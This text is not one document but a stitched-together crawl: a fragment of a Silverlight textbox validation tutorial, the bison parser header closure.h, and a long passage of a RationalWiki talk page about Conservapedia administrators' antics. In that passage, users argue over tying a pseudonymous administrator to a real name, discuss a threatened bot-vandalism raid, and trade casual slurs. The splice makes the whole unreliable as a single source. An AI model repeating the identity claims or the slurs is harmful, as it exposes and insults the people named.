Setter property to throw an error, it will work very similar to validation. However a more formal validation is provided as a library. Simply type Validate=”” in XAML and an enum will pop up with possible validations. For now, this is a short list (notice how SmallMoney checks to see if a double is valid in the SQL SmallMoney range and number of decimals): public enum Validate: byte { None, EmptyString, Email, Password, SmallMoney } So we could provide the following XAML: <g:STextBox x: Now typing a blank value results in: Hovering over the “error” icon will popup a tooltip explaining that input for this field is required. In addition, there is an ErrorConditionEventHandler (test condition or NullOrEmpty for an error reset). public delegate void ErrorConditionEventHandler(string condition); public event ErrorConditionEventHandler ErrorCondition; The event can be useful to let a form know there is an error (and for instance disable the “Save” button). General News Question Answer Joke Rant Admin
http://www.codeproject.com/KB/silverlight/STextBox.aspx
crawl-002
refinedweb
2,803
55.74
/* Subroutines for bison Copyright (C) 1984, 1989, 2000, 2001, 2002. */ #ifndef CLOSURE_H_ # define CLOSURE_H_ # include "gram.h" /* Allocates the itemset and ruleset vectors, and precomputes useful data so that closure can be called. n is the number of elements to allocate for itemset. */ void new_closure (unsigned int n); /* Given the kernel (aka core) of a state (a vector of item numbers ITEMS, of length N), set up RULESET and ITEMSET to indicate what rules could be run and which items could be accepted when those items are the active ones. RULESET contains a bit for each rule. CLOSURE sets the bits for all rules which could potentially describe the next input to be read. ITEMSET is a vector of item numbers; NITEMSET is its size (actually, points to just beyond the end of the part of it that is significant). CLOSURE places there the indices of all items which represent units of input that could arrive next. */ void closure (item_number *items, size_t n); /* Frees ITEMSET, RULESET and internal data. */ void free_closure (void); extern item_number *itemset; extern size_t nritemset; #endif /* !CLOSURE_H_ */
http://opensource.apple.com//source/bison/bison-14/src/closure.h
CC-MAIN-2016-44
refinedweb
180
71.85
Knowing Eclipse shortcut to comment and uncomment single line or block of code can save you lot of time while working in Eclipse. In fact I highly recommend every Java programmer to go through these top 30 Eclipse shortcut and 10 java debugging tips in Eclipse for improved productivity. If you are Java programmer, coding in Eclipse and want to comment and uncomment single line or block of code quickly you can either use ctrl + / to comment a single line and subsequently uncomment a commented line. If you want to comment a block of code or a complete method, you have two option you can either line comment (//) all those selected lines or block comment (/* */) those lines. For line comment multiple line, select multiple line and press ctrl + /, it will put // in front of every line. For block commenting in Eclipse, first select all the lines or code block you want to comment and then enter ctrl+shift+/ it will put /* on first line and */ on last line. Here is better illustrated example of commenting and uncommenting Java code in Eclipse IDE : Eclipse shortcut to comment one line or block code in Java public void printHello(){ System.out.println("HelloWorld"); } System.out.println("HelloWorld"); } and I want to comment line which is printing HelloWorld, just put the courser on that line and type ctrl+/ , you will see following line : public void printHello(){ // System.out.println("HelloWorld"); } // System.out.println("HelloWorld"); } If you want to comment whole method , first select whole method and then type ctrl+/, this will line comment all selected line as shown below : // System.out.println("HelloWorld"); //} If you want to block comment whole block than type ctrl + shift + / and it will put /* and */ on first and last line, as shown below : /*public void printHello(){ System.out.println("HelloWorld"); }*/ System.out.println("HelloWorld"); }*/ This Eclipse shortcut for commenting and uncommenting Java code will surely help you save few keystrokes and improve your speed while working in Eclipse. To learn more Eclipse comments short cuts see Top 30 Eclipse keyboard Shortcuts for Java programmer. Further Learning Beginners Eclipse Java IDE Training Course Eclipse Debugging Techniques And Tricks The Eclipse Guided Tour - Part 1 and 2 Other Eclipse tutorials for Java programmer 2 comments : I Am Facing A Very Unique Problem Rare For Any To Face When I Am Compiling And Running My Java Code Its Getting Compiled And Shows Output In Text-pad/ Eclipse Editor But When I Am Running It Through saved in a textpad calling in DOS Of Win XP Professional. It Compiling Successfully But When Trying To Run It Though Window's DOS It Throws _______My Code States Like This_______ ________________________________________________ public class HelloWorld { public static void main(String[] args[]) { System.out.println("Hello, World"); } } ________________________________________________ Exception in thread "main" java.lang.NoClassDefFoundError: HelloWorld) Ranjeet, The java classpath is not set correctly when you are trying to run your java program directly on the command line, hence the self-evident 'NoClassDefFoundError'.
https://javarevisited.blogspot.com/2012/12/eclipse-shortcut-to-comment-uncomment.html?showComment=1355304046822
CC-MAIN-2019-39
refinedweb
495
50.5
Conservapedia talk:What is going on at CP?/Archive178 Contents - 1 Creator of "guidelines" - 2 Ha! - 3 BEST DIFF EVAH! - 4 Deletions - 5 Anyone Else? - 6 spam - 7 How come no one has pointed out that... - 8 Vandal bot - 9 Truly, truly, truly outrageous - 10 Vandal site - 11 CEASE AND DESIST - 12 Best... Schlaflism... EVAR! - 13 Not WIGO worthy 'cause it's TK - 14 Regardless of political ideology? - 15 Hazarding a guess - 16 Motherf**ker - 17 There's a first for everything - 18 Jacob's endgame? - 19 Point - 20 This won't last long - 21 Well I never... - 22 Trim to fit on one line - 23 ...and now it won't fit on one line... - 24 Ken logic - 25 What the fuck was this? - 26 I tip my hat - 27 Ken's Sense Of Humour - 28 Mass vandalism wave - 29 Abortion and Hitler - 30 Poe's paradox - 31 Conservative Bible Project - 32 Standby for a Crap Joke from DeltaStar communications - 33 An Ed Poor favourite..... - 34 I know they don't like Richard Dawkins... - 35 Check out their new toy - 36 Whichever asshole rewrote my WIGO - 37 Translation - 38 Can people please effing stop highlighting new parodists - 39 Andy's latest comment - 40 "Stoopid" WIGO - 41 hehe irony - 42 It's TK, so it isn't really even worth mentioning, but still... - 43 Andrew Schlafly in the Princeton Alumni Weekly - 44 Oh Ken! - 45 Speaking of parodists, doesn't anyone wonder why an alleged resident of a small city in the Yucatan is editing articles about American synogogues. ... - 46 How The Mind Works: Andy - 47 Fatwah? - 48 AllenShaw - 49 Nothin' like censorship - 50 Merging dup vote counts - 51 Karajou Strikes Back - 52 Andy, Cameron and eggs - 53 Birther state - 54 Someone tell this to Andy (Lenin birthday WIGO) - 55 Cp Sysops are bored - 56 You gotta love Ken's writing style Creator of "guidelines"[edit] "...the guideline I issued" sayeth TK.img(my emphasis). Well at least we know who's in charge. yummy & honey(or marmalade) 00:38, 15 April 2010 (UTC) Ha![edit] Should be goodimg ("Conservapedia is considering launching a Conservapedia Creation vs. Evolution Project in the future.") Go for it Ken. At least you won't have those pesky evilutionists to contend with like PJR has on his blog. 01:14, 15 April 2010 (UTC)yummy & honey(or marmalade) - Haha, first Andy was "Conservapedia" (third person), and now Ken is too. All kneel before the collective entity that is CP! - Also: we never saw Operation Grassroots or whatever it was, so I doubt this will happen. Tetronian you're clueless 01:17, 15 April 2010 (UTC) - Ken has always been Conservapedia, or at least its intelligence wing (snork!). When "Conservapedia has learnt" something, you can be sure that Kendoll and no one else will be in the loop. And you can be sure that the thing that Conservapedia has learnt will never, ever happen. --JeevesMkII The gentleman's gentleman at the other site 01:24, 15 April 2010 (UTC) BEST DIFF EVAH![edit] TK bitching to no one listening at wikipedia. ħuman 03:49, 14 April 2010 (UTC) - Advice to members of that CONservative vandal site: when you are in a hole, stop digging! So much for TK's whole "I'm not Terry Kockrocks" argument! AnarchoGoon Swatting Assflys is how I earn my living 03:55, 14 April 2010 (UTC) - "From your cowardly anonymous perch, 69.165.155.235, please don't bring fictitious narratives here." - "...posting my real identity at RW and all over the Internet with the intent to cause me harm." - (Disclaimer: He could technically be denying that, but I'm not sure what he'd be complaining about then...) ~ Kupochama[1][2] 06:04, 14 April 2010 (UTC) - It gets better! That hole-digging smiley, eh, who cares? ħuman 08:26, 14 April 2010 (UTC) - And Timmy TooLoose replies... "Uh huh...." Brilliant. ħuman 08:27, 14 April 2010 (UTC) - It's quite silly indeed. Apparently, this has become a "He Who Must Not Be Named" situation where ANY mention of a certain full name is automatically an outing attempt of TK on CP and WP. The more hilarious part is that his public cries just shine a giant spotlight on it. It's kinda like someone saying "I wonder who did this," and someone else instantly going "IT WASN'T ME, YOU CAN'T PROVE ANYTHING!" Oh well, maybe it'll get me in touch with Jimbo Wales (who has been allegedly informed of this by TK). That'd be kinda cool, I guess. --Sid (talk) 09:03, 14 April 2010 (UTC) - Attention seeking perhaps? Ajkgordon (talk) 09:16, 14 April 2010 (UTC) - At this point, I have no idea what Rob and TK are planning to achieve anymore. Their efforts seem utterly random so far. --Sid (talk) 09:22, 14 April 2010 (UTC) - Indeed. Worse than random, incoherent. However, I think they want Jimbo to block you, me, and Trent until we remove Terry Koeckritz's real name from the internet. ħuman 09:29, 14 April 2010 (UTC) I take it back. This one is even better! In a perverse sort of way, but that's his style, isn't it? ħuman 10:57, 14 April 2010 (UTC) -- Nx / talk 11:29, 14 April 2010 (UTC) - Don't be boring. Also, why does your sig take up a whole line of text, noob? ħuman 11:36, 14 April 2010 (UTC) - Because it conforms to wp:WP:SIG -- Nx / talk 11:40, 14 April 2010 (UTC) - That's a retarded answer. This isn't WP and their policies don't apply here. ħuman 13:55, 14 April 2010 (UTC) Wow, that whole section is just a universe of fail on TK's part. I can imagine what any uninvolved party things when they across that and all they see it TK flailing and screaming, while all the other editors are just calmly asking him WTF he's on about. Bullying, indeed. --Kels (talk) 13:27, 14 April 2010 (UTC) - I wonder which new site Terry Koeckritz is trolling now, that's he's so worried about having his name up in lights. After all, logic would dictate that if he's so worried about CP admin TK being linked to the name Terry Koeckritz, then it must be his name. I'd love to see this go to court: - "Are you Terry Koeckritz?" - "Yes." - "But you're suing these people because they said you were Terry Koeckritz." - At this point the witness became hysterical and was carried from the courtroom, screaming something about "Where's the banhammer? Why can't I oversight this?" --PsyGremlinParla! 17:34, 14 April 2010 (UTC) My goodness. Having just reread the SDG and now seen TK's antics on WP, including calling me a liar, I have to say I've never seen anything quite like TK. TK - I'm not going to tolerate you calling me a liar and I won't be a pawn in your pointless effort to distance TK from Terry Koeckritz. I won't demand that you retract the objective falsehoods you've already made on the WP:Wikiquette page, just that you knock the lying off. Got it buddy? 17:48, 14 April 2010 (UTC) Somebody just posted this extract from the SDG on my blog (I have the ref - SDG/Level_1/29e7df4a2c4a2bd4.html). I think this should shut TK up for once and for all (my emphasis in bold:--PsyGremlinTala! 18:39, 14 April 2010 (UTC) - 29e7df4a2c4a2bd4 19:31, 14 April 2010 (UTC) - I can't find the link right off, but I remember him posting a bunch of our real names last July over on CP for some vindictive reason or another. I know mine was there, which is odd since I generally tried to avoid interacting with him, complete with a link to my old comic site. I also remember he and Koward used to delight in posting Ames' full name as well as others' to apparently discredit them if anyone Googled, so it's probably a bit late for him to worry about the morality of "outing" by this point. --Kels (talk) 19:40, 14 April 2010 (UTC) - His openly defamatory talk page diff and the start of a temper tantrum are hereimg. I'm glad he had the good sense to remove that stuff from public view. 19:49, 14 April 2010 (UTC) Moar better[edit] Fucking insane logic I fell off my chair. "Since I am an administrator at another wiki, as you could plainly see on my page, the idea that I would be vandalizing another wiki is pretty remote." And yet, since we are all, oh never mind. ħuman 04:22, 15 April 2010 (UTC) - Vandal sites[citation NOT needed] aren't wikis! Stop remembering my name, Huw Powell! ~ Kupochama[1][2] 05:11, 15 April 2010 (UTC) Deletions[edit] TKimg and DouglasAimg are at the great spring cleaning, freeing Conservapedia not only from pop-culture, but also from atheist propaganda, i.e., articles on works of atheists. Well, Andy once stated Perhaps one should help them to reach the goal of 20,000 entries (currently, there are ~37,000)? TK, have a look at cp:category:years! larronsicut fur in nocte 05:42, 14 April 2010 (UTC) - '[...]You don't grasp the beauty of the destruction of articles. Do you know that Conservapedia is the only encyclopedia in the net whose database gets smaller every year?' - Maquissar did know that, of course. He smiled, sympathetically he hoped, not trusting himself to speak. Schlafly bit off another fragment of the dark-coloured bread, chewed it briefly, and went on: - 'Don't you see that the whole aim of Conservapedia is to narrow the range of thought? In the end we shall make a liberal world-view literally impossible, because there will be no words in which to express it. Every concept that can ever be needed, will be expressed by exactly one article, with its meaning rigidly defined and all its subsidiary meanings rubbed out and forgotten. Already, in the Eleventh Edition, we're not far from that point. But the process will still be continuing long after you and I are dead. Every year fewer and fewer articles, and the range of consciousness always a little smaller. Even now, of course, there's no reason or excuse for indulging in liberalism. It's merely a question of self-discipline, reality-control. But in the end there won't be any need even for that. The Revolution will be complete when Conservapedia is perfect. Conservapedia is Theocon and Theocon is Conservapedia,' he added with a sort of mystical satisfaction. Has it ever occurred to you, Maquissar, that by the year 2050, at the very latest, not a single human being will be alive who could understand such a conversation as we are having now?' - 'Except-' began Maquissar doubtfully, and he stopped. - It had been on the tip of his tongue to say 'Except liberals,' but he checked himself, not feeling fully certain that this remark was not in some way unorthodox. Schlafly, however, had divined what he was about to say. - 'Liberals are not human beings,' he said carelessly. 'By 2050 or earlier, probably -- all real knowledge of Oldview will have disappeared. The whole literature of the past will have been destroyed. Russell, Marx, Hemingway, Dawkins -- they'll exist only in Theocon versions, not merely changed into something different, but actually changed into something contradictory of what they used to be. Even the literature of the Party will change. Even the commandments will change. How could you have a commandment like the 90/10 rule against talk, talk, talk, when the concept of debate has been abolished? The whole climate of thought will be different. In fact there will be no thought, as we understand it now. Conservapedia means not thinking -- not needing to think. Conservapedia is unconsciousness.' --George Orwell and Maquissar (talk) 08:00, 14 April 2010 (UTC) - Larron: between 33,000 and 33,100 articles as of yesterday. If I'm not mistaken there is actually less text in the article namespace proper now than there was two years ago. mb 09:56, 14 April 2010 (UTC) Ahh, that explains a lot. It's mostly cover for "disappearing" an embarrassing essay that was linked from elsewhere (and probably included some embarrassing comments by admins too). Subtle, real subtle. --Kels (talk) 13:38, 14 April 2010 (UTC) - The page was written almost entirely by one BHarlan over the course of a few days in October 2008. RJJensen and Terrence Kockfritz made some minor tweaks to it last August. For the most part the page is an ideologically neutral and genuinely informative sysnopsis of the history of the Civil Rights movement. As such it is pretty damning for the Republicans. The article explicitly calls out icons such as Ronald Reagan, William F Buckley, and John McCain for their opposition to Civil Rights legislation, their support of South African Apartheid, and their general bigotry. The article also explicitly mentions that the driving force behind every step forward were liberal Democrats. It heaps scorn on Paleoconservatives to the point of actually using the word. - The page is liberally sprinkled, however, with some hilarious conspiracy crap about Black preachers using hypnosis and brainwashing to keep their parishoners dependent. Black people in general are blamed for making it easy for them. Also, Black people are being lied to about the Democrats by, wait for it, public schools. - The overall effect is that of a very weird pastiche. mb 14:53, 14 April 2010 (UTC) - I figured TK would zap that article as soon as it was linked, so I saved the code as a text file. here's the link. Damn shame I couldn't get the talk page though.... SirChuckBCall the FBI 04:58, 16 April 2010 (UTC) - Found it SirChuckBOne of those deceitful Liberals Schlafly warned you about 05:04, 16 April 2010 (UTC) Anyone Else?[edit] I just had to have a little chuckle when I saw TK bitching about this stupid FoxNews stimulus share calculator. Tell you what TK. We liberals will pay back all the stimulus money, you conservatives take care of the Iraq War and we'll care it even. SirChuckBBoom Goes the Dynamite 08:21, 14 April 2010 (UTC) PS, since you're bloxered over here, feel free to reply on my Wikipedia page. - $39, me. Less than I struggled to send to Haiti. Fine by me. ħuman 08:49, 14 April 2010 (UTC) - From the linked humanevents article - - Hmmmmm no mention of that commie, philandering Clinton....Acei9 10:03, 14 April 2010 (UTC) - Well, only people making money in/living in America need to pay this, which I am not. Fine by me too. ThiehWhat is NOT going on? 14:46, 14 April 2010 (UTC) - $403 was my result, they can send that to me by check or money order please. I do wish my "tax burden" on that pie chat was really that low, lol. --BMcP - Just an astronomy guy 21:41, 14 April 2010 (UTC) - BMcP, I think it's your share of the extra national debt (which they allege somehow has to be repaid eventually) due to government spending the stimulus money. Thieh"6+18=24" 01:06, 15 April 2010 (UTC) spam[edit] can't link cus i'm on my cell, but there's some serious spam shit going down in the recent changes Tweety (talk) 17:54, 14 April 2010 (UTC) - Exampleimg. Prob 4chan/Anonymous again. Doubt anything will happen. Andy will just turn off account creation. It's not like they have any new editors anyway. --PsyGremlin話しなさい 18:01, 14 April 2010 (UTC) - Captured, plus a cap request of the non-diff version: From Geology Terms Iimg - It's a silly threat, of course, but judging from what I saw from the Zeuglothingy Blues, it'll likely notch up the paranoia in the new discussion group. Ah well. --Sid (talk) 18:06, 14 April 2010 (UTC) - Oh, fun: Karajou is on it.img --Sid (talk) 18:08, 14 April 2010 (UTC) - I like how his note was longer than a lot of the articles it replaced. Jaxe (talk) 18:13, 14 April 2010 (UTC) - I see Karajerk used his challenge as a handy opportunity to deleteimg his talkpage without archiving. --PsyGremlinTala! 18:22, 14 April 2010 (UTC) - Is this the massive attack everyone is talking about on Ames/Huw/Kel/Sid/Trent's secret discussion site? — Sincerely, Neveruse / Talk / Block 18:27, 14 April 2010 (UTC) - They've already turned off account creation. Not hard to get around though; all they need to do is coordinate account creation, as in create all 512 acccounts in the space of a few minutes. NU - sorry, but these guys are just one part of Operation Shit-smeared Windmill.EddyP (talk) 18:28, 14 April 2010 (UTC) I made a WIGO about it but everyone seems hellbent on removing all traces of the threats. This could be quite funny if they do it properly. I'm guessing it's /b/, yes? Webbtje (talk) 18:44, 14 April 2010 (UTC) - (EC)I threw another little WIGO out there. It all hinges upon whether or not you believe the vandal, but I wouldn't be surprised either way. EddyP (talk) 18:45, 14 April 2010 (UTC) - It could be an interesting standoff, with account creation indefinitely suspended and the CP cabal standing around with their dicks in the hands. Let's see out what happens... — Sincerely, Neveruse / Talk / Block 18:47, 14 April 2010 (UTC) - I like Ken's post on the mainpage about how web traffic is up. Especially: The Asian population of web visitors to Conservapedia (Asians certainly have a reputation for studiousness), is above average according to Quantcast. Go team Conservapedia! Yaaaaaaaaaaay! You go Ken! SJ Debaser 18:52, 14 April 2010 (UTC) - Quick, someone send Karajou/TK/Andy the global blocking script. K61824Insomnia? Masturbate till you pass out 18:59, 14 April 2010 (UTC) Block 19:01, 14 April 2010 (UTC) I like that the 'constant attacks' are only 12 hours a day. I guess their mommys don't let them have computer time after 9pm. - They've oversighted Ken's mainpageright edit. EddyP (talk) 20:39, 14 April 2010 (UTC) - To be fair, they need a job to pay the utilities bill and sleep time for the job too. But then again, Oversighting Ken's edit is a bit over the line. Wait, didn't they say they have bots for this? I guess it has somthing to do with night mode then. K61824[Talk needed] 23:44, 14 April 2010 (UTC) It's on[edit] At least TerryH started itimg (and oversighted the note). K61824TK = Terry Koeckritz 19:32, 14 April 2010 (UTC) - Good for the stats, Ken will be pleased OléOléOlé, 12000000 edits in april... Bad because Rob will blame RW and it's suppersekkrit forum/den of evil masterminds...But Thats not RW's style, we strive for sysopship! - Damn you /b/tards!!!! We should Be CP's Forest Rangers... Someone once said something like 'We must preserve this gem of the internet for our grand-childrens... This will be our we used to walk 12 miles in the snow ... look what used to argue with... Alain (past 4:20) - Nothing's happened so far. Sounds like just an empty threat. Now that I think about it, /b/ would probably just attack without making grandiose-sounding threats beforehand. Tetronian you're clueless 01:13, 15 April 2010 (UTC) - Not really, they are first and fore-most attention whores. Before Anonymous attacked the Australian Parliament's website earlier this year they made all these boding videos warning of the attacks, they still garnered very little press outside of the Government owned ABC. - π 01:44, 15 April 2010 (UTC) - They attacked the Australian Parliament? Wow, that's low. Tetronian you're clueless 01:46, 15 April 2010 (UTC) - Given that the week before the Government announced a $22 million cyber-terrorism detection centre, complete with a giant Hollywood style computer screen that appeared to do nothing spanning one wall , it was kind off funny in its own way. - π 02:52, 15 April 2010 (UTC) - What the hell is "cyber-terrorism", anyway? I mean, I know we are, but what are we? ħuman 04:30, 15 April 2010 (UTC) - Something for the government to spend money on to "protect" us from. Also calling people cyber-terrorist sells newspapers. I am more annoyed about the confusion in the media about hackers and crackers. Hackers "hack" at programmes to make them work better/different, so long as it is open source this is legal. A cracker tries to get into a secured system, this is always illegal. I wish the media would learn the difference and stop liabling the noble hacker who only wants to write computer code. - π 04:38, 15 April 2010 (UTC) - What the hell is "cyber-terrorism", anyway? I mean, I know we are, but what are we? ħuman 09:31, 15 April 2010 (UTC) - Well, what we do is, we very cleverly register an account on a wiki that uses nothing more than a simple Turing test to keep you out. So basically, so long as you are not a computer, you can register. We then very stealthily click a button that says "edit" and use it to change the text that appears on the page so that is says something that Andy disagrees with. This is then reverted by the click of a button and our account is blocked so that the "edit" button is no longer available to us. That is, as far as I can tell, the definition of "cyber-terrorism" as being used by Terry Koeckritz. - π 10:59, 15 April 2010 (UTC) How come no one has pointed out that...[edit] - Moved from the Saloon Bar ...the Evolution article currently begins with a charming picture of cross-burning. Also, what the heck is up with all the Skype-spamming? Vulpius (talk) 19:53, 14 April 2010 (UTC) - I love it, although it could use a little hitwin. I'm not sure what the Skype spamming is about, but knowing that Ken is a search engine optimization magnate, I think we'd do best to follow suit. — Sincerely, Neveruse / Talk / Block 20:02, 14 April 2010 (UTC) - - Gah. Sorry for messing up the page. Vulpius (talk) 20:30, 14 April 2010 (UTC) - First it's Hitwin, then it's the Klan. should we give Ken a list of racists to be included in the article? ThiehZOYG I edit like Kenservative! 00:06, 15 April 2010 (UTC) - Would it be more fun to tell ♥ K e n D o l l ♥ you have to be a Christian to be in the KKK, or more fun just to let him leave that shit there? --JeevesMkII The gentleman's gentleman at the other site 01:12, 15 April 2010 (UTC) - I think KenLogic works like this: if you are a True Christian, you are not a racist. Also, some evolutionists were racists. Therefore, evolution = racism. Therefore, all evolutionists are racists. Tetronian you're clueless 01:14, 15 April 2010 (UTC) - (Also, I love that his source is an article from Jerry "A billion undergrad degrees, and still a blithering nitwit" Bergman published in the Journal of Creation. Scholarly! Good to see CMI are keeping those standards up. PJR would approve.) --JeevesMkII The gentleman's gentleman at the other site 01:20, 15 April 2010 (UTC) This reminds me...don't search engines usually remove/adjust for sites that abuse the ranking systems? ~ Kupochama[1][2] 03:02, 15 April 2010 (UTC) - Depends on how you are doing it. The two main things the quality control bots look for is reciprocal links, this is why after the initial bump Ken's rankings tend to drop back to lower than they were a few days earlier, and repetitive material, e.g, the same site having multiple copies of the same page or parts of the page. Usually Ken gets good results from the spiders because of all the incoming links, but after a few days when the slower, less frequently run bots come along and look at what is actually going they get dropped back down the page ranks. - π 05:25, 15 April 2010 (UTC) - I'm pretty sure that as far as organizations supporting evolution go, the KKK is pretty damn far down the list. They're your typical "I ain't no monkey" group. DickTurpis (talk) 22:28, 15 April 2010 (UTC) Vandal bot[edit] I'm just curious... what does everyone think about the possibility of that happening? regarding the 521 dudes with open proxies worldwide. teh rational ghey (talk) 02:28, 15 April 2010 (UTC) - Incredibly slim. There are basically no skilled programmers on CP. ħuman 02:51, 15 April 2010 (UTC) - - True, but it a fairly secure site. And they use checkuser very liberally. no pun intended. teh rational ghey (talk) 02:54, 15 April 2010 (UTC) - My guess is that it is most likely some newbie on the /b/ forums thinking CP is a great target for a raid. There is probably only one other person serious about this and the other 519 (mostly socks, but given they are using the same handle who can tell) are playing them for "lulz". They will launch his two man assault to the laughing of all the others. - π 03:27, 15 April 2010 (UTC) - Should we expect a sequel to the FBI incident?. K61824Ed Poor types in Chinese? 06:31, 15 April 2010 (UTC) - FBIII?-- Spirit of the Cherry Blossom 12:52, 15 April 2010 (UTC) - It's just another newf*g who thinks that /b/ is his personal army. Fail levels are low to moderate. -- CodyH (talk) 14:43, 15 April 2010 (UTC) - Can you like not use that word? thanks. 208.125.226.138 (talk) 14:48, 15 April 2010 (UTC) - I'm all for teh gays, but I think we need to take certain uses of the word "fag" back. — Sincerely, Neveruse / Talk / Block 15:05, 15 April 2010 (UTC) - Stupid fucking fags Tweetylet's have buttsecks 15:17, 15 April 2010 (UTC) you're gay. YOUR SO GAY SO FUCKING GAY I read Conservapedia and they said yyer goin to hell! It's a real place ya know. No fer reels. I've been there. with assfly. teh rational ghey (talk) 15:23, 15 April 2010 (UTC) - Fags=smokes=cigarettes. Now let's see how many people can resist jokes based on smoking a fag.-- Spirit of the Cherry Blossom 16:35, 15 April 2010 (UTC) The use of 'fag' as an insult conjures up images of frantically masturbating 14 year olds shouting at Counterstrike. I wish people would put a modicum of thought into insulting people, it's much more entertaining. Webbtje (talk) 16:38, 15 April 2010 (UTC) - How could it be made back into a general-purpose insult? It's a good word. I want it back. — Sincerely, Neveruse / Talk / Block 16:42, 15 April 2010 (UTC) - Reminder: we have an article for this. ThiehAhh! my eyes!! 17:13, 15 April 2010 (UTC) - NU, I just rely on the standby general purpose insult of "Fucktard". It's clean, eloquent and hard to misconstrue. In situations requiring more finesse, I tell the offending party to "shut your two-cock garage", which is especially hilarious when the recipient is female. When all else fails, I just ignore the hell out of them. I've dealt with drill sergeants and I live with the most opinionated and vocal female I've ever encountered, so I'm terribly good at blocking everything out and imagining I'm at the circus, watching midget pirates shoot lollipops out of cannons into the crowd from the tightrope. Or whatever. The Foxhole Atheist (talk) 20:19, 15 April 2010 (UTC) - I do have a special affinity for the word "fucktard"...and, of course, I can't think of it without being reminded of Kent Hovind. — Sincerely, Neveruse / Talk / Block 20:22, 15 April 2010 (UTC) - I find the -tard suffix horrible and offensive and I wish people wold stop. you'll be calling people mongols next. Totnesmartin (talk) 20:28, 15 April 2010 (UTC) - I tend to think people horribly offended by words have very small, delicate minds. If people would stop getting offended by words that are just words, all this retarded shit wouldn't be so gay. — Sincerely, Neveruse / Talk / Block 20:30, 15 April 2010 (UTC) - I find selective, aggressive apathy offensive. No offense. ~ Kupochama[1][2] 20:50, 15 April 2010 (UTC) - At least it has to be selective and aggressive to offend you. It's better than "word = offensive", regardless of context. — Sincerely, Neveruse / Talk / Block 20:58, 15 April 2010 (UTC) - Agreed. Then again, I haven't heard anyone say that sort of thing since I was ten. Maybe I don't watch the news enough? ~ Kupochama[1][2] 21:12, 15 April 2010 (UTC) @N: I retract my testimony, you darn mongol. @H: I find those two Ks 66% racist. Stop offending my wiki. ~ Kupochama[1][2] 21:42, 15 April 2010 (UTC) - Aren't Fags obnoxious assholes in leather with noisy motorcycles? Alain (talk) 21:44, 15 April 2010 (UTC) - A fag is a younger boy who you can beat and who toasts your bread at all decent schools. yummy & honey(or marmalade) 21:46, 15 April 2010 (UTC) - Damn straight! Well, straight as far as the public is concernced.-- Spirit of the Cherry Blossom 22:45, 15 April 2010 (UTC) - I've never heard that interpretation. In any case, this conversation certainly took a bizarre turn... Tetronian you're clueless 23:53, 15 April 2010 (UTC) - Fagging yummy & honey(or marmalade) 23:56, 15 April 2010 (UTC) - That explains it, then: we don't use the word that way in the US. (At least, I imagine you would get some oddly offended looks if you did.) Tetronian you're clueless 00:00, 16 April 2010 (UTC) - "When I was at school, we used to line up four or five of his sort, make 'em bend over, and use 'em as a toast rack." CrundyTalk nerdy to me 08:20, 16 April 2010 (UTC) Truly, truly, truly outrageous[edit] What is outrageous is that anyone at WP would take all of this standing on chairs and screaming as any sort of serious complaint rather than trolling. I tell you, this is outrageous! --Kels (talk) 00:15, 16 April 2010 (UTC) - While I totally understand the reasons why several RW editors are getting involved in the ongoing saga at WP, I'd like to suggest to them all that a break might be advisable. TK and RobS (TK-CP and Nobs01) are trolling; nothing more, nothing less. None of their complaints are being taken seriously by anybody except people from here. They have managed to get to the point where an admin would be justified in making up to 4 blocks to stop the pointless edit-warring, insult-hurling and general trolling that's going on. - Don't let them do this to you. - There are plenty of other WP/RW crossover editors whom you can tag if necessary. Don't let yourselves become frustrated to the point of gaining a block. - Everybody here should know how TK operates. He will bang on and on about process while all the time lying, and perverting the truth, but calling him a liar isn't going to work. - The position of TK and RobS is untenable and that's obvious. They know that, too. Don't let them score a minor victory by letting yourselves be blocked. –SuspectedReplicant retire me 00:38, 16 April 2010 (UTC) - QFT. -- Nx / talk 00:43, 16 April 2010 (UTC) - He's now claiming in his patented way that I forged the chat log in which he said he was suing TMT. He has also called me a liar and said that my clients and prospective clients might be interested in what he says is my inability to keep confidences. As an attorney I can't have someone who thinks he's anonymous on the internet threatening my business and law license. I'll do what it takes to drive that point home without getting blocked on WP, but thanks for the concern. 01:34, 16 April 2010 (UTC) - Then you should raise that issue on one of the WP noticeboards. Reverting him on his talk page (where he does have the right to remove comments, unfortunately), will only get you blocked. -- Nx / talk 01:39, 16 April 2010 (UTC) - I have no WP-fu. To whose attention do I raise this issue and is there a way to do it privately? 01:54, 16 April 2010 (UTC) - I don't know, maybe wp:WP:RFC/U? -- Nx / talk 02:02, 16 April 2010 (UTC) Wow, that one's impressive. His response to someone complaining that TK's freaking out in an inappropriate place is the blame the victim and ironically bitch about wiki administrators ignoring clear rule violations. It's a masterpiece of trolling, right there. Seriously, if this guy's so obviously just stirring shit up for no clear purpose, is there any official recourse that can be taken there? I don't know WP policy well enough to say. --Kels (talk) 01:47, 16 April 2010 (UTC) - I must say that I agree with Suspected Replicant here. Let TK and RobS dig their graves over at Wikipedia. It already shows that none of the sysops over there give two shits about their complaining. Lord Goonie Hooray! I'm helping! 02:10, 16 April 2010 (UTC) - Am I reading this correctly - is rob suggesting that Rational Wiki material should be included or referenced? Would that make it a reliable source? --Shagie (talk) 05:22, 16 April 2010 (UTC) - The same thought occurred to me but then I realised that I was getting notability confused with reliability. Lily Inspirate me. 16:12, 16 April 2010 (UTC) - Advice to all, per above, lay low and keep quiet, while the grave-digging is going on. If you are "active" on WP, do what I do as a mouthwash, hit "random page" twenty times and fix anything you see that is wrong. Again, let Knobs and TKnobs dig their own graves. ħuman 08:38, 16 April 2010 (UTC) - For 200 dollar: Violent or unrestrained in temperament or behavior? - *BZZZT* - WHAT IS OUTRAGEOUS --GTac (talk) 11:51, 16 April 2010 (UTC) - Human: Laying low or lying low? K61824Ask me for relationship advice 16:11, 16 April 2010 (UTC) Wow. TK goes away for a few hours (and nobs, coincidentally), and five or so people work on the wording and do a good job of improving it. Then nobs asks an irrelevant question, and TK pops in at the same time, coincidentally, and calls it "unacceptable" and drag the tone down about 5 levels. ħuman 01:32, 17 April 2010 (UTC) Vandal site[edit] I love how TK manages to use every opportunityimg to advertise a certain vandal site, that would otherwise be PNG on CP and the average non-parodist user (stops to laugh hysterically for a moment) would know nothing about them. If you call them, they will come. --PsyGremlinSpeak! 09:56, 16 April 2010 (UTC) - I wonder if there are any other vandal sites out there that think TK is talking about them? That guy who posted the silly threat, for example.194.6.79.200 (talk) 10:55, 16 April 2010 (UTC) - TK, you silly sod, what a stupid, pointless and totally baseless thing to put up on the front page of a so-called "encyclopedia." I can't believe Andy hasn't removed that yet. Godwin's Law, anyone? SJ Debaser 11:51, 16 April 2010 (UTC) - It's Emmanuel Goldstein from 1984! 